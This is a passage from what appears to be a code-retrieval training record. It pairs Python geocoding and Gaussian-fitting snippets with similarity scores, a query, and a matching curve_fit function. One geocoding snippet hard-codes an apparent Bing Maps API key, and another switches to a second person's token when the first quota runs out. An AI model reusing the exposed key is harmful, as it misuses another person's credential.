geocoding is prefered in this case, but might be quite expensive\n if not np.isnan(r['zip']):\n res = zipcodes[zipcodes['zip'] == str(int(r['zip']))]\n if len(res) == 1:\n return res.values[0].tolist()[:3]\n\n return [None, None, None]", "def search(self):\n return self.key.geocode(self.cleanplace)", "def 
ad_rep_city_state(obj):\n return '%s, %s' % (obj.ad_rep.geolocation_object.us_city.name,\n obj.ad_rep.geolocation_object.us_state.abbreviation)", "def regeocodeZipLevelPts(overwrite=False):\n\n\tif exists(regeo_qcew) and not overwrite:\n\t\tprint '\\nthis year\\'s qcew has already been regecoded, if you wish'\n\t\tprint 'to overwrite the existing file use the \"overwrite\" flag\\n'\n\t\treturn\n\n\tmanagement.CopyFeatures(qcew_2913, regeo_qcew)\n\tmanual_geos = retrieveManualGeocodes()\n\n\tregeo, manual = 0, 0\n\twith da.UpdateCursor(regeo_qcew, '*') as cursor:\n\t\tfor row in cursor:\n\t\t\td = OrderedDict(zip(cursor.fields, row))\n\n\t\t\tif int(d['PRECISION_']) > 250:\n\t\t\t\taddr_str = '{0}, {1}, {2}, {3}'.format(\n\t\t\t\t\td['STREET'], d['CITY'], d['ST'], d['ZIP'])\n\n\t\t\t\trsp = geocode(addr_str)\n\t\t\t\tif isinstance(rsp, int):\n\t\t\t\t\tprint 'there seems to a problem in connecting with'\n\t\t\t\t\tprint 'the rlis api halting geoprocessing until this'\n\t\t\t\t\tprint 'is resolved'\n\t\t\t\t\texit()\n\t\t\t\telif rsp:\n\t\t\t\t\t# assign now geometry to row\n\t\t\t\t\td['Shape'] = (rsp['ORSP_x'], rsp['ORSP_y'])\n\n\t\t\t\t\t# update geocoding attributes\n\t\t\t\t\td['DESC_'] = rsp['locator']\n\t\t\t\t\td['PRECISION_'] = 10\n\t\t\t\t\td['GISDATA'] = 'RLIS API Geocoder'\n\t\t\t\t\td['GSCR'] = rsp['score']\n\t\t\t\t\td['Match_TYPE'] = 'A'\n\t\t\t\t\td['POINT_X'] = rsp['ORSP_x']\n\t\t\t\t\td['POINT_Y'] = rsp['ORSP_y']\n\t\t\t\t\tregeo+=1\n\n\t\t\t\telif d['BIN'] in manual_geos:\n\t\t\t\t\tmg_dict = manual_geos[d['BIN']]\n\t\t\t\t\tcoords = mg_dict['Shape']\n\t\t\t\t\t\n\t\t\t\t\td['Shape'] = coords\n\t\t\t\t\td['DESC_'] = mg_dict['Loc_name']\n\t\t\t\t\td['PRECISION_'] = 10\n\t\t\t\t\td['GISDATA'] = 'Address Massaging + RLIS'\n\t\t\t\t\td['GSCR'] = mg_dict['Score']\n\t\t\t\t\td['Match_TYPE'] = mg_dict['Match_type']\n\t\t\t\t\td['POINT_X'] = coords[0]\n\t\t\t\t\td['POINT_Y'] = coords[1]\n\n\t\t\t\t\tmanual+=1\n\n\t\t\twrite_row = [v for v in d.values()]\t\n\t\t\tcursor.updateRow(write_row)\n\n\tprint '\\nregocoded: {0}, from manual: {1}'.format(regeo, manual)", "def country() -> str:", "def geocode(location):\n\n\ttxt = fetch_mapzen_response(location)\n\tmydict = parse_mapzen_response(txt)\n\tmydict['query_text'] = location\n\treturn mydict", "def build_search_locations(suburbs=['Balgowlah']):\n\n postcode_file = os.path.join(os.path.join(os.path.dirname(os.path.realpath(__file__)),'..'),'postcodes.csv')\n postcodes = pd.read_csv(postcode_file)\n \n if 'NSW' in suburbs:\n postcodes = postcodes[postcodes['State'] == 'NSW']\n if 'QLD' in suburbs:\n postcodes = postcodes[postcodes['State'] == 'QLD']\n if 'SA' in suburbs:\n postcodes = postcodes[postcodes['State'] == 'SA']\n if 'NT' in suburbs:\n postcodes = postcodes[postcodes['State'] == 'NT']\n if 'ACT' in suburbs:\n postcodes = postcodes[postcodes['State'] == 'ACT']\n if 'WA' in suburbs:\n postcodes = postcodes[postcodes['State'] == 'WA']\n if 'TAS' in suburbs:\n postcodes = postcodes[postcodes['State'] == 'TAS']\n\n if set(suburbs).issubset(['All', 'NSW', 'QLD', 'SA', 'NT', 'ACT', 'WA', 'TAS']):\n suburbs = postcodes['Suburb']\n\n # buld the locations with additional parameters\n searchLocations = {}\n for suburb in suburbs:\n location_df = postcodes[postcodes['Suburb'] == suburb]\n\n if location_df.shape[0] > 0:\n location = {'state': location_df['State'].values[0], \n 'suburb': location_df['Suburb'].values[0], \n 'postcode': location_df['Postcode'].values[0],\n 'includeSurroundingSuburbs': True}\n searchLocations[suburb] = 
location\n else:\n print (f'{suburb} is not in the list.')\n\n return searchLocations", "def convert_id(text):\n GOOGLE_API_KEY = os.environ['GOOGLE_API_KEY']\n geo = GoogleV3(api_key=GOOGLE_API_KEY)\n location = geo.geocode(place_id=text)\n # remove \", USA\" from end of location\n return location.latitude, location.longitude, location.address[:-5].strip()", "def city_country(city, country):\n city_and_country = city + ', ' + country\n return city_and_country.title()", "def google_geocode(query):\n\tif not API_KEY:\n\t\traise ConfigException(\"Require API_KEY for googleapi. Reload after setting.\")\n\td = {\"address\" : query.encode(\"utf-8\"), \"key\" : API_KEY }\n\tf = urlopen(LOC_URL % (urlencode(d)))\n\tlocdata = load(f)\n\tif f.getcode() == 200:\n\t\tif \"results\" in locdata:\n\t\t\titem = locdata[\"results\"]\n\t\t\tif len(item) == 0:\n\t\t\t\treturn None\n\t\t\titem = item[0]\n\t\t\tll = item.get(\"geometry\", {}).get(\"location\") # lol tricky\n\t\t\tif not ll: return None\n\t\t\treturn item[\"formatted_address\"], ll[\"lat\"], ll[\"lng\"]\n\t\telse:\n\t\t\treturn None\n\telse:\n\t\traise RuntimeError(\"Error (%s): %s\" % (f.getcode(), locdata.replace(\"\\n\", \" \")))", "def address2latlon(addr):\n key = \"AjVyhHv7lq__hT5_XLZ8jU0WbQpUIEUhQ7_nlHDw9NlcID9jRJDYLSSkIQmuQJ82\" # quota de 125 000 requêtes/année\n # b = geocoder.bing([lat, lon], key=key)\n g = geocoder.bing(addr, key=key)\n #g = geocoder.google(addr)\n gjson = g.json\n timeout = time.time() + 7\n while gjson is None: # Redo until we have a response\n g = geocoder.google(addr)\n gjson = g.json\n if time.time() > timeout: # if google can't find the address after a certain amount of time\n sys.exit(\"Google ne trouve pas cette adresse, veuillez réessayer\")\n return g.latlng", "def city_country(city, country):\r\n\treturn(city.title() + ', ' + country.title())", "def COUNTRY_CODE():\n COUNTRY_CODE = \"us/90210\"\n return COUNTRY_CODE", "def clean_address(self, s):\n # The letter \"O\" instead of the numeral \"0\" is a common mistake.\n s = re.sub(\n r\"\\b[A-Z][O0-9][A-Z]\\s?[O0-9][A-Z][O0-9]\\b\", lambda x: x.group(0).replace(\"O\", \"0\"), clean_string(s)\n )\n for k, v in province_or_territory_abbreviations().items():\n # Replace a province/territory name with its abbreviation.\n s = re.sub(\n r\"[,\\n ]+\"\n r\"\\(?\" + k + r\"\\)?\"\n r\"(?=(?:[,\\n ]+Canada)?(?:[,\\n ]+[A-Z][0-9][A-Z]\\s?[0-9][A-Z][0-9])?\\Z)\",\n \" \" + v,\n s,\n )\n # Add spaces between province/territory abbreviation, FSA and LDU and remove \"Canada\".\n return re.sub(\n r\"[,\\n ]+\" r\"([A-Z]{2})\" r\"(?:[,\\n ]+Canada)?\" r\"[,\\n ]+([A-Z][0-9][A-Z])\\s?([0-9][A-Z][0-9])\" r\"\\Z\",\n r\" \\1 \\2 \\3\",\n s,\n )", "def check_born_place(input_string: str) -> tuple:\n c = input_string[0]\n if c == 'A':\n return 'Taipei City', 10\n elif c == 'B':\n return 'Taichung City', 11\n elif c == 'C':\n return 'Keelung City', 12\n elif c == 'D':\n return 'Tainan City', 13\n elif c == 'E':\n return 'Kaohsiung City', 14\n elif c == 'F':\n return 'New Taipei City', 15\n elif c == 'G':\n return 'Yilan County', 16\n elif c == 'H':\n return 'Taoyuan City', 17\n elif c == 'I':\n return 'Chiayi City', 34\n elif c == 'J':\n return 'Hsinchu County', 18\n elif c == 'K':\n return 'Miaoli County', 19\n elif c == 'L':\n return 'Taichung County', 20\n elif c == 'M':\n return 'Nantou County', 21\n elif c == 'N':\n return 'Changhua County', 22\n elif c == 'O':\n return 'Hsinchu City', 35\n elif c == 'P':\n return 'Yunlin County', 23\n elif c == 'Q':\n return 'Chiayi 
County', 24\n elif c == 'R':\n return 'Tainan County', 25\n elif c == 'S':\n return 'Kaohsiung County', 26\n elif c == 'T':\n return 'Pingtung County', 27\n elif c == 'U':\n return 'Hualien County', 28\n elif c == 'V':\n return 'Taitung County', 29\n elif c == 'W':\n return 'Kinmen County', 32\n elif c == 'X':\n return 'Penghu County', 30\n elif c == 'Y':\n return 'Yangmingshan Management Bureau', 31\n elif c == 'Z':\n return 'Lienchiang County', 33\n else:\n # Should not happen\n return None, None # The return value is a tuple containing two values", "def get_address_by_name(name, limit):\n request = \"{}/{}?key={}&q={}&type=json&limit={}\".format(config.GEOCODE_URL, config.GEOCODE_SEARCH_PATH, config.GEOCODE_KEY, name, limit)\n response = requests.get(request).json()\n return response", "def apply(data, options=default_options, config=default_config, warning=print):\n\n if options[\"reverse\"]:\n\n # convert address to lat,lon\n if not \"address\" in list(data.columns):\n raise Exception(\"reserve address resolution requires 'address' field\")\n data.reset_index(inplace=True) # index is not meaningful\n for retries in range(config[\"retries\"]):\n try:\n pos = geocode(data[\"address\"],\n provider = config[\"provider\"],\n user_agent = config[\"user_agent\"],\n timeout = config[\"timeout\"],\n )\n break\n except Exception as err:\n pos = err\n import time\n time.sleep(config[\"sleep\"])\n if type(pos) is Exception or type(pos) is ModuleNotFoundError:\n raise pos\n data[\"longitude\"] = list(map(lambda p: p.x,pos[\"geometry\"]))\n data[\"latitude\"] = list(map(lambda p: p.y,pos[\"geometry\"]))\n return data\n\n else:\n\n # convert lat,lon to address\n try:\n lats = list(map(lambda x: float(x),data[\"latitude\"]))\n lons = list(map(lambda x: float(x),data[\"longitude\"]))\n pos = list(map(lambda xy: Point(xy),list(zip(lons,lats))))\n except:\n pos = None\n if type(pos) == type(None):\n raise Exception(\"address resolution requires 'latitude' and 'longitude' fields\")\n for retries in range(config[\"retries\"]):\n try:\n addr = reverse_geocode(pos,\n provider = config[\"provider\"],\n user_agent = config[\"user_agent\"],\n timeout = config[\"timeout\"],\n )\n break\n except Exception as err:\n addr = err\n import time\n time.sleep(config[\"sleep\"])\n if type(addr) is Exception or type(addr) is ModuleNotFoundError:\n raise addr\n data[\"address\"] = Series(addr[\"address\"],dtype=\"string\").tolist()\n return data", "def get_address(address: str) -> Tuple[str, str, str]:\n\n # Try to geocode the address as given\n g = geocoder.osm(address)\n\n if g.json is not None:\n\n # TODO this is inefficient and hacky\n\n # First thing we attempt if the result isn't complete is just to\n # add the housenumber (often the issue).\n if not good_geocoder_result(g.json):\n g.json['housenumber'] = usaddress.tag(address)[0]['AddressNumber']\n\n # If the result is now good, return it\n if good_geocoder_result(g.json):\n\n # Geocoding was successful. 
Return the result\n return (\n # First part is a nicely formatted address\n f\"{g.json['housenumber']} {g.json['street']}, {g.json['city']}, {g.json['state']} {g.json['postal']}\",\n # Second is the latitude\n g.json['lat'],\n # And third is the longitude\n g.json['lng']\n )\n\n # Geocoding was unsuccessful.\n # Let's try to create a cleaner address by first parsing out the pieces we need, then try again.\n \n # Parsing the address components...\n parsed, addr_type = usaddress.tag(address)\n if addr_type != \"Street Address\":\n raise ValueError(f\"Address could not be properly parsed. Resulting type: {addr_type}. Result: \\n{parsed}\")\n \n # Trim off any whitespace from the parsed components.\n for part in parsed:\n parsed[part] = parsed[part].strip()\n\n reqd_address_parts = ['AddressNumber', 'StreetName', 'PlaceName']\n if any(address_part not in parsed for address_part in reqd_address_parts):\n raise ValueError(f\"The address must have at least a house number, street, and city.\")\n \n # Initialize the resulting address string with the address number (aka house/street number)\n new_address = parsed['AddressNumber']\n \n # If the streetname is just a number, make it ordinal\n if parsed['StreetName'].isnumeric():\n parsed['StreetName'] = ordinal(parsed['StreetName'])\n \n # Get the whole street name\n for k, v in [(k, v) for k, v in parsed.items() if k.startswith(\"StreetName\")]:\n new_address += f\" {v}\"\n \n # Add the city...\n new_address += f\", {parsed['PlaceName']}\"\n # Add the state, if it exists\n if 'StateName' in parsed:\n new_address += f\", {parsed['StateName']}\"\n # And the zip code, if it exists\n if 'ZipCode' in parsed:\n new_address += f\" {parsed['ZipCode']}\"\n \n # Now try to geocode this improved address\n g = geocoder.osm(new_address)\n\n if g.json is not None:\n\n # Geocoding was successful. Return the result\n return (\n # First part is a nicely formatted address\n f\"{g.json['housenumber']} {g.json['street']}, {g.json['city']}, {g.json['state']} {g.json['postal']}\",\n # Second is the latitude\n g.json['lat'],\n # And third is the longitude\n g.json['lng']\n )\n \n # Still can't geocode the address. 
Throw an error\n else:\n raise ValueError(f\"Could not geocode this address: {address}\")", "def get_country_from_coordinates(coordinates):\n geolocator = Nominatim(user_agent=\"random_one\")\n location = geolocator.reverse(coordinates, language='en')\n country = location.address.split(',')[-1].strip()\n return country", "def preprocess(df, combine_list, single_provinces=[\"Hubei\"]):\n \n \"\"\" Mark single regions that are to remain separate\"\"\"\n for single_province in single_provinces:\n df.loc[df[\"Province/State\"]==single_province, \"Country/Region\"] = single_province\n \n \"\"\" Combine rows for other country provinces\"\"\"\n next_index = max(df.index)\n for singlename in combine_list:\n \n \"\"\" Select country\"\"\"\n singlecountry = df.loc[df[\"Country/Region\"]==singlename,:]\n \n \"\"\" Compute sum of provinces\"\"\"\n singlesum = singlecountry.sum(axis=0)\n \n \"\"\" Set other column variables\"\"\"\n singlesum[\"label\"] = singlename\n singlesum[\"Province/State\"] = np.nan\n singlesum[\"Country/Region\"] = singlename\n \n \"\"\" Drop provinces from DataFrame\"\"\"\n df = df.loc[df[\"Country/Region\"]!=singlename,:]\n \n \"\"\"Merge country sum into DataFrame\"\"\"\n singlesum.name = next_index\n next_index += 1\n df = df.append(singlesum)\n\n \"\"\" Rename rest of Mainland China\"\"\"\n df.loc[df[\"Country/Region\"]==\"Mainland China\", \"Country/Region\"] = \"Mainland China w/o Hubei\"\n df.loc[df[\"Country/Region\"]==\"China\", \"Country/Region\"] = \"China w/o Hubei\"\n \n \"\"\" Reset index to region name\"\"\"\n df[\"label\"] = df[\"Country/Region\"]\n df.loc[pd.notna(df[\"Province/State\"]),\"label\"] = df.loc[pd.notna(df[\"Province/State\"]),:][\"Province/State\"]\n df.index = df[\"label\"]\n \n df = df.sort_index()\n \"\"\" Drop unused columns\"\"\"\n df = df.drop(['Province/State', 'Country/Region', 'Lat', 'Long', \"label\"], axis = 1) \n \n \"\"\" Return\"\"\"\n return df", "def return_address_from_location_yelp(location='0,0'):\n if not re.compile('^(\\-?\\d+(\\.\\d+)?),\\s*(\\-?\\d+(\\.\\d+)?)$').match(location):\n raise ValueError('Location Invalid')\n base_url = 'https://maps.googleapis.com/maps/api/geocode/json?'\n latlng = 'latlng=' + location\n try:\n #This try block is for our first 150,000 requests. 
If we exceed this, use Jack's Token.\n key_string = '&key=' + ACCESS_TOKEN\n url = base_url + latlng + key_string #Builds the url\n print(url)\n result = requests.get(url).json() #Gets google maps json file\n cleaned = result['results'][0]['address_components']\n\n #Address to check against value of check_against_business_location\n chk = cleaned[0]['long_name'] + ' ' + cleaned[1]['long_name'] + ', ' + cleaned[3]['long_name']\n business_tuple = check_against_business_location(location, chk)\n \n if business_tuple[0]: #If true, the lat, lon matches a business location and we return business name\n address_comp = cleaned[0]['long_name'] + ' ' + cleaned[1]['short_name']\n # print(business_tuple[1])\n # print(cleaned[3]['short_name'])\n # print(address_comp)\n return business_tuple[1], cleaned[3]['short_name'], address_comp\n else: #otherwise, we just return the address\n # print(cleaned[0]['long_name'])\n # print(cleaned[1]['short_name'])\n # print(cleaned[3]['short_name'])\n return cleaned[0]['long_name'] + ' ' + cleaned[1]['short_name'] + ', ' + cleaned[3]['short_name']\n except:\n try:\n #Use Jack's Token in case of some invalid request problem with other API Token\n key_string = '&key=' + JACK_TOKEN\n url = base_url + latlng + key_string #Builds the url\n result = requests.get(url).json() #Gets google maps json file\n cleaned = result['results'][0]['address_components']\n #Address to check against value of check_against_business_location\n chk = cleaned[0]['long_name'] + ' ' + cleaned[1]['long_name'] + ', ' + cleaned[3]['long_name']\n business_tuple = check_against_business_location(location, chk)\n if business_tuple[0]: #If true, the lat, lon matches a business location and we return business name\n address_comp = cleaned[0]['long_name'] + ' ' + cleaned[1]['short_name'] \n # print(address_comp)\n # print(business_tuple[1])\n # print(cleaned[3]['short_name'])\n return business_tuple[1], cleaned[3]['short_name'], address_comp\n else: #otherwise, we just return the address\n # print(cleaned[0]['long_name'])\n # print(cleaned[1]['short_name'])\n # print(cleaned[3]['short_name'])\n return cleaned[0]['long_name'] + ' ' + cleaned[1]['short_name'] + ', ' + cleaned[3]['short_name']\n except:\n raise ValueError(\"Something went wrong\")", "def city_country(city, country):\n c_c = '\"' + city + \", \" + country + '\"'\n return c_c.title()", "def geo_by_address(row):\n try:\n # parse the address to separate PHN and street\n parsed = p.address(row['Address'])\n # geocode\n result = g.address(house_number=parsed['PHN'], street_name=parsed['STREET'], borough=row['Borough'])\n lat = result.get(\"Latitude\")\n lon = result.get('Longitude')\n msg = result.get('Message')\n except GeosupportError as ge:\n lat = \"\"\n lon = \"\"\n msg = str(ge)\n return pd.Series([lat, lon, msg])", "def get_lat_lon(data):\n from time import sleep\n from geopy import geocoders\n from geopy.exc import GeocoderTimedOut\n\n gn = geocoders.GeoNames(username='foobar')\n\n cities = get_cities(data).keys()\n\n coords = {}\n for city in cities:\n while True:\n try:\n loc = gn.geocode(city + \", Brazil\")\n except GeocoderTimedOut:\n sleep(2)\n else:\n break\n\n coords[city] = (loc.latitude, loc.longitude)\n\n return coords" ]
[ "0.6251422", "0.6227843", "0.60835624", "0.59131515", "0.585577", "0.5806368", "0.57388103", "0.5738554", "0.5722705", "0.5614146", "0.5594229", "0.55850214", "0.5574379", "0.5574237", "0.5490394", "0.54893243", "0.5472008", "0.5418318", "0.5418175", "0.53998554", "0.5397736", "0.5386239", "0.53849584", "0.5378844", "0.5339769", "0.53364867", "0.5327788", "0.53224933", "0.5322037", "0.5321113", "0.52885896", "0.52755964", "0.5272301", "0.5270091", "0.5260717", "0.5253881", "0.52360845", "0.5216993", "0.52057487", "0.51985604", "0.51971364", "0.5180807", "0.517686", "0.5175928", "0.51748836", "0.5166193", "0.5150535", "0.5145937", "0.5142975", "0.51392704", "0.5133376", "0.5126237", "0.5123751", "0.51184106", "0.5115204", "0.5114417", "0.5113796", "0.51110685", "0.5091969", "0.50846815", "0.50843346", "0.5083156", "0.5079877", "0.50794274", "0.50788146", "0.50779575", "0.5063621", "0.50625247", "0.5058997", "0.5056097", "0.50552326", "0.5050407", "0.5043395", "0.5033377", "0.5021597", "0.5020593", "0.5019379", "0.50177604", "0.50171655", "0.5000316", "0.4999475", "0.49984112", "0.498988", "0.49799815", "0.49793094", "0.49780336", "0.49774754", "0.49760884", "0.49744663", "0.4971502", "0.49704307", "0.49686837", "0.4966119", "0.49658853", "0.49648887", "0.49597067", "0.49575415", "0.49542418", "0.49466604", "0.49287623" ]
0.6954527
0
fit offset gaussian, with offset, amplitude, and sigma constrained to be positive
def fitgauss(bin_edges, counts, guess): """sigma is constrained to be >= one bin width""" """unless guess[3] < 0, then offset set to zero""" bincen = np.zeros(np.size(bin_edges)-1) bincen[:] = bin_edges[0:np.size(bin_edges)-1] binstep = bin_edges[2]-bin_edges[1] bincen += binstep/2 #print(bincen) #print(counts) #plt.plot(bincen, counts, label = 'data') #plt.show() if(guess[3]>0): #allow y_offset coeff, var_matrix = curve_fit(gauss, bincen, counts, guess, bounds=([0,-np.inf, binstep, 0],[np.inf,np.inf, np.inf, np.inf])) [A, mu, sigma, yoff] = coeff else: #force y_offset to be zero - pure gaussian coeff, var_matrix = curve_fit(puregauss, bincen, counts, guess[0:3], bounds=([0,-np.inf, binstep],[np.inf,np.inf, np.inf])) [A, mu, sigma] = coeff yoff = 0.0 c_exp = gauss(bincen, A, mu, sigma, yoff) resid2 = sum((c_exp - counts)**2) #print coeff # print var_matrix #display check #hist_fit=gauss(bincen, *coeff) #plt.plot(bincen, counts, label='data') #plt.plot(bincen, hist_fit, label='fit') #plt.show() return [A, mu, sigma, yoff, resid2]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def gaussian(x, *parameters):\n position, sigma, amplitude, background = parameters\n return amplitude * np.exp(-(x - position)**2 / (2.0 * sigma**2)) + background", "def gaussian(mu, wid, x):\n return np.exp(-((x - mu) / (0.6005612 * wid))**2)", "def Gaussian(x, mu=0, sigma=26.4, A=1, y0=0):\r\n #width = sigma*(2*np.sqrt(2*np.log(2)))\r\n b = 1/(sigma*np.sqrt(2*np.pi))\r\n f = b*np.power(np.e, -(((x-mu)**2)/(2*sigma**2)))\r\n return A*f + y0", "def fitgaussian(self, data):\n params = self.moments(data)\n errorfunction = lambda p: ravel(self.Gauss(*p)(*indices(data.shape)) - data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def gaussian_kernel(training_ex, landmark, sigma=0.1):\n return np.exp(-(np.linalg.norm(training_ex - landmark) ** 2 / (2 * (sigma ** 2))))", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: ravel(gaussian(*p)(*indices(data.shape)) -\n data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def gaussian1d(x, x0, w0, A, offset):\n if w0 == 0:\n return 0\n return A * np.exp(-2 * (x - x0) ** 2 / (w0 ** 2)) + offset", "def gaussian_k(x0, y0, sigma, height, width):\n y = np.arange(0, width, 1, float)\n x = np.arange(0, height, 1, float)[:, np.newaxis]\n return np.exp(-((x - x0) ** 2 + (y - y0) ** 2) / (2 * sigma ** 2))", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: np.ravel(gaussian(*p)(*np.indices(data.shape)) -\n data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: np.ravel(gaussian(*p)(*np.indices(data.shape)) -\n data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def Gaussian(x, mu, sigma, a):\n amplitude = a / ( sigma * np.sqrt(2 * np.pi) )\n u = (x - mu) / sigma\n return amplitude * np.exp( -0.5 * (u**2) )", "def gaussian(x, amplitude=1.0, center=0.0, sigma=1.0):\n \n return (amplitude/(np.sqrt(2.*np.pi)*sigma)) * exp(-np.power((1.0*x-center)/(sigma), 2.)/2.)", "def gaussian(amp, fwhm, mean, x):\n return amp * np.exp(-4. 
* np.log(2) * (x-mean)**2 / fwhm**2)", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: np.ravel(gaussian(*p)(*np.indices(data.shape)) -\n data)\n p, success = leastsq(errorfunction, params)\n return p", "def fit_gaussian(array):\n\n shape = array.shape\n xmean, ymean = numpy.array(shape) / 2.\n\n xx, yy = numpy.mgrid[:shape[0], :shape[1]]\n\n g_init = astropy.modeling.models.Gaussian2D(amplitude=1., x_mean=xmean, y_mean=ymean,\n x_stddev=1., y_stddev=1.)\n\n f2 = astropy.modeling.fitting.LevMarLSQFitter()\n\n gg = f2(g_init, xx, yy, array)\n\n return gg", "def gaussian(x, mu, sigma):\n return (np.exp(-(x - mu)**2 / 2.0 / sigma**2) /\n np.sqrt(2.0 * np.pi) / sigma)", "def gaussian(pars, x):\n A, b, mu, sigma = pars\n # return b + A/(np.sqrt(2*np.pi)*sigma**2) \\\n return b + A \\\n * np.exp(-.5*(x - mu)**2/sigma**2)", "def gaussian(x, mean, sigma):\n return np.exp(-np.square(x-mean)/(2*np.square(sigma))) / (np.sqrt(2*np.pi*sigma**2))", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: np.ravel(gaussian(*p)(*np.indices(data.shape)) -\n data)\n #p, success = optimize.leastsq(errorfunction, params)\n bnds = (0,30)\n p = optimize.least_squares(errorfunction, params, bounds = bnds).x\n #least square fitting(minimizes raw data and fit)\n return p", "def two_dim_gaussian(xy_mesh, amplitude, xo, yo, sigma_x, sigma_y, offset, theta):\n #DEBUG\n theta = check_theta(theta)\n sigma_x, sigma_y = check_sigma(sigma_x, sigma_y)\n xo, yo = float(xo), float(yo)\n x, y = xy_mesh[0], xy_mesh[1]\n a = (np.cos(theta) ** 2) / (2 * sigma_x ** 2) + (np.sin(theta) ** 2) / (2 * sigma_y ** 2)\n b = -(np.sin(2 * theta)) / (4 * sigma_x ** 2) + (np.sin(2 * theta)) / (4 * sigma_y ** 2)\n c = (np.sin(theta) ** 2) / (2 * sigma_x ** 2) + (np.cos(theta) ** 2) / (2 * sigma_y ** 2)\n res = offset + amplitude * np.exp(- (a * ((x - xo) ** 2) + 2 * b * (x - xo) * (y - yo) + c * ((y - yo) ** 2)))\n #DEBUG print(\"Fitting with: amp = {:.2f}, xo = {:.2f} px, yo = {:.2f} px, sigma_x = {:.2f} px, sigma_y = {:.2f} px, offset = {:.2f} px, theta = {:.2f} deg\".format(amplitude, xo, yo, sigma_x, sigma_y, offset, np.rad2deg(theta)))\n return res.ravel()", "def gaussian(mu, sigma, start, end):\r\n \r\n val = np.linspace(start, end, 100)\r\n a = 1/(sigma*np.pi)\r\n b = - 0.5 * np.power((mu - val)/sigma, 2)\r\n return a*np.exp(b)", "def fit_gaussian(position, energy, dx=0.005, a=2, b=1.5, db=0.01, tolerance=0.05, max_iterations=1000):\n min_energy, max_energy = min(energy), max(energy)\n x_start, x_range = min(position), max(position) - min(position)\n x_gauss = np.arange(0, x_range, dx)\n f_gauss = np.exp(-a * (x_range / 2 - x_gauss) ** 2 + b)\n delta_energy = abs(max(f_gauss) - max_energy)\n b_direction = np.sign(max_energy - max(f_gauss))\n print('E_WHAM: %.3f | E_GAUSS: %.3f | b_direction: %i' % (max_energy, max(f_gauss), b_direction))\n for i in range(max_iterations):\n b = b + b_direction * db\n f_gauss_trial = np.exp(-a * (x_range / 2 - x_gauss) ** 2 + b)\n delta_energy_trial = abs(max(f_gauss_trial) - max_energy)\n if delta_energy_trial < tolerance:\n f_gauss = f_gauss_trial\n print('Found b value: %.2f with dE: %.3f within tolerance in %i iterations' % (b, delta_energy, i))\n break\n elif delta_energy_trial < delta_energy:\n f_gauss = f_gauss_trial\n delta_energy = delta_energy_trial\n print('Finished fitting. 
%i iterations | dE: %.3f | b_final: %.2f' % (i, delta_energy, b))\n return (x_gauss + x_start, f_gauss)", "def fit_gaussian(self, mask=None):\n data = self.data\n mask = numpy.logical_or(mask, numpy.ma.getmaskarray(data))\n fdata = data[~mask].data\n xdata = numpy.asarray([cm[~mask]\n for cm in self.bset.cmesh]).transpose()\n scale, mean, cov = fit_ndgaussian(xdata, fdata)\n return scale, mean, cov", "def _gaussian_distribution(self, x: ndarray, mu: float, sigma: float) -> ndarray:\n return 1 / (np.sqrt(2 * np.pi) * sigma) * np.exp(\n -np.power(\n (x - mu) / sigma, 2) / 2)", "def gaussian(size,sigma):\n a,b=np.ogrid[-size/2:size/2,-size/2:size/2]\n mask = a**2+b**2\n mask = np.exp(-mask.astype('float')/(2*float(sigma**2)))\n return mask", "def fit_gaussian(arr):\n\tif isinstance(arr, ac.kernels.Kernel):\n\t\tarr = arr.array\n\telif isinstance(arr, np.ndarray):\n\t\tpass\n\telse: \n\t\traise Exception(\"[psfmatch] input needs to be a kernel or array\")\n\n\tnx, ny = arr.shape\n\tx, y = get_xy_grid(nx, ny)\n\n\tmodel_init = am.functional_models.Gaussian2D(amplitude=arr.max(), x_mean=0., y_mean=0., x_stddev=5., y_stddev=5., theta=0.)\n\tfitter = am.fitting.LevMarLSQFitter()\n\n\t# with warnings.catch_warnings():\n\t\t# warnings.simplefilter('ignore')\n\tmodel_best = fitter(model_init, x, y, arr)\n\n\treturn model_best", "def gaussian(x, amp, cen, wid):\n return amp * exp (-(x-cen)**2/(2*wid**2))", "def gaussian_likelihood(x, mu, log_std):\n std = tf.exp(log_std)\n pre_sum = tf.square((x - mu)/std) + 2*log_std + np.log(2*np.pi)\n return -0.5 * tf.reduce_sum(pre_sum, axis=1)", "def initiategaussian(sd, x0):\n y = np.exp(-x**2/(2*sd**2))\n return y", "def gaussian(amp, fwhm, mean):\n return lambda x: amp * np.exp(-4. * np.log(2) * (x-mean)**2 / fwhm**2)", "def set_gaussian(self, X, sigma=0):\n sigma = float(sigma)\n if sigma < 0:\n raise ValueError('sigma should be positive')\n self.set_euclidian(X)\n d = self.weights\n\n if sigma == 0:\n sigma = (d ** 2).mean()\n\n w = np.exp(- (d ** 2) / (2 * sigma))\n self.weights = w", "def gaussian(x, peak_x=.0, sigma=1.0, name=''):\n x = x.astype(np.float)\n variables = {'function': gaussian, 'peak_x': peak_x, 'sigma': sigma}\n y = np.exp((-1 * (x - peak_x)**2) / (2 * sigma**2))\n return packer(x, y, variables, name=name)", "def gauss_kernel(X, test_locs, X_org, test_locs_org, sigma, sigma0, epsilon):\r\n DXT = Pdist2(X, test_locs)\r\n DXT_org = Pdist2(X_org, test_locs_org)\r\n # Kx = torch.exp(-(DXT / sigma0))\r\n Kx = (1 - epsilon) * torch.exp(-(DXT / sigma0) - DXT_org / sigma) + epsilon * torch.exp(-DXT_org / sigma)\r\n return Kx", "def fit_gaussian_1d(image: Image, params_0=None, bounds=None, axis=0):\n arr, arr_e = image.array, image.array_e\n ordinate = arr.mean(axis=axis)\n\n # Now we can generate an array of errors.\n ordinate_e = np.sqrt(np.mean(arr_e**2, axis=axis))\n\n # Setting default values.\n if params_0 is None:\n # Now we generate the initial values for our Gaussian fit.\n # These values are crucial – as this is a high dimensional fitting\n # problem, it is likely that we'll get stuck in a local minimum if these\n # aren't good.\n # Guess that the Gaussian mean is at the most intense mean pixel value.\n mean0 = np.argmax(ordinate)\n # Guess that the standard deviation is a single pixel.\n sdev0 = 1\n # Guess that the background (offset) is the median 